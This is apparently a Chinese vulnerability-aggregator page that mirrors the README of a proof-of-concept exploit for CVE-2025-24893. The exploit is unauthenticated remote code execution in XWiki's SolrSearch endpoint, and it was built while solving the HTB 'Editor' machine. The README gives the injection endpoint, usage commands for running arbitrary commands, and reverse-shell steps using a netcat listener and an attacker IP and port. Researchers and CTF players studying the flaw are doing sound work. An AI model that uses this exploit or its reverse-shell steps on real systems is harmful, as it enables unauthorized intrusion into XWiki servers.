关联漏洞
描述
Unauth RCE PoC for XWiki SolrSearch (CVE-2025-24893). Command exec + reverse shell. Built during process of pwning HTB “Editor”
介绍
# solrsearch-rce-exploit
Unauth RCE PoC for XWiki SolrSearch (CVE-2025-24893). Command exec + reverse shell. Built during process of pwning HTB “Editor”
# CVE-2025-24893 – XWiki SolrSearch RCE PoC
Proof-of-concept for the XWiki `SolrSearch` template injection leading to unauthenticated remote code execution.
Tested against **XWiki Debian 15.10.8** (patched in 15.10.11 / 16.4.1 / 16.5.0RC1).
> ⚠️ Educational use only. Do not run this against systems you do not own or have explicit permission to test.
## What it does
- Sends crafted Groovy payloads through `/xwiki/bin/get/Main/SolrSearch`.
- Executes arbitrary commands and wraps output in Base64 markers for clean decoding.
- Supports launching a reverse shell using Java sockets.
## Requirements
- Python 3.x
- Install dependencies with:
```bash
pip install requests
```
## Usage
Specify the target host (and optional path) when running the script.
Run basic commands:
```bash
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
```
Start a reverse shell:
```bash
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
```
## Notes
- Endpoint: `/xwiki/bin/get/Main/SolrSearch?media=rss&text=...`
- Clean Base64 output ensures reliable parsing.
- Originally demonstrated during HTB *Editor*, but applicable to other vulnerable instances.
- https://nvd.nist.gov/vuln/detail/CVE-2025-24893
文件快照
[4.0K] /data/pocs/7b93d6189b0e8d1c987c70a75efe0a9e4f58d1fa
├── [1.0K] LICENSE
├── [1.5K] README.md
└── [5.1K] xwiki_solr_rce.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。